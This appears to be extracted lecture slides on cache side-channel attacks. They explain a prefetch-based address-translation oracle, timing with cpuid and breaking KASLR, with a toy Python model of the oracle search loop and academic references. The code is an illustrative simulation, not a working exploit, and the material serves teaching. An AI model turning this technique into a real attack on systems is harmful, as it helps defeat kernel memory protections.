Address-Translation Oracle

User space

Cache

Kernel space

load

prefetch

Page 186: Side-Channel Security - Chapter 2: Cache Template Attacks

Address-Translation Oracle

User space

Cache

Kernel space

reload (cache hit)

load
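The oracle steps above amount to a search: for each candidate physical address, prefetch the corresponding direct-map address and then reload a user page; a cache hit means the candidate maps the same physical page. The Python model below captures that loop; the direct-map base, the toy page table, and the tiny "physical memory" are made-up values for illustration.

```python
DIRECT_MAP = 0xFFFF880000000000  # hypothetical direct-physical-map base

# Toy translation: user virtual page -> physical page (normally unknown
# to an unprivileged attacker; this is what the oracle recovers).
page_table = {0x7F0000000000: 0x3A000}
cache = set()  # set of cached *physical* addresses

def translate(vaddr):
    if vaddr >= DIRECT_MAP:              # direct map: phys = vaddr - base
        return vaddr - DIRECT_MAP
    return page_table[vaddr & ~0xFFF] | (vaddr & 0xFFF)

def prefetch(vaddr):
    cache.add(translate(vaddr))          # prefetch does not check privileges

def flush(vaddr):
    cache.discard(translate(vaddr))

def reload_is_hit(vaddr):
    return translate(vaddr) in cache     # caches are physically indexed

def find_physical(user_vaddr, max_phys=0x100000, step=0x1000):
    """Scan direct-map candidates until reloading the user page hits."""
    for phys in range(0, max_phys, step):
        flush(user_vaddr)
        prefetch(DIRECT_MAP + phys)
        if reload_is_hit(user_vaddr):
            return phys
    return None

phys = find_physical(0x7F0000000000)
```

The key point the model encodes is that the cache is physically indexed: two virtual addresses mapping the same physical page share cache lines, so the prefetch of one makes the reload of the other fast.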

Page 187: Side-Channel Security - Chapter 2: Cache Template Attacks

Timing the prefetch instruction

The CPU may reorder instructions

instruction 1

cpuid

instruction 2

cpuid

instruction 3

but not over cpuid!

Page 188: Side-Channel Security - Chapter 2: Cache Template Attacks

Breaking KASLR with Prefetch

Plot: prefetch time in cycles (100-500, y-axis) over kernel offset in MB (−16 to 40, x-axis). The offsets where the driver is mapped show distinctly lower prefetch times.

Page 190: Side-Channel Security - Chapter 2: Cache Template Attacks

References

[1] Gruss, D., Maurice, C., Wagner, K., and Mangard, S. (2016). Flush+Flush: A Fast and Stealthy Cache Attack. In DIMVA.

[2] Gruss, D., Spreitzer, R., and Mangard, S. (2015). Cache Template Attacks: Automating Attacks on Inclusive Last-Level Caches. In USENIX Security Symposium.

[3] Inci, M. S., Gulmezoglu, B., Irazoqui, G., Eisenbarth, T., and Sunar, B. (2015). Seriously, Get Off My Cloud! Cross-VM RSA Key Recovery in a Public Cloud. Cryptology ePrint Archive, Report 2015/898.

[4] Lipp, M., Gruss, D., Spreitzer, R., Maurice, C., and Mangard, S. (2016). ARMageddon: Cache Attacks on Mobile Devices. In USENIX Security Symposium.

[5] Liu, F., Yarom, Y., Ge, Q., Heiser, G., and Lee, R. B. (2015). Last-Level Cache Side-Channel Attacks are Practical. In S&P.

[6] Maurice, C., Le Scouarnec, N., Neumann, C., Heen, O., and Francillon, A. (2015). Reverse Engineering Intel Complex Addressing Using Performance Counters. In RAID.

[7] Maurice, C., Weber, M., Schwarz, M., Giner, L., Gruss, D., Alberto Boano, C., Mangard, S., and Romer, K. (2017). Hello from the Other Side: SSH over Robust Cache Covert Channels in the Cloud. In NDSS.

[8] Yarom, Y., Ge, Q., Liu, F., Lee, R. B., and Heiser, G. (2015). Mapping the Intel Last-Level Cache. Cryptology ePrint Archive, Report 2015/905.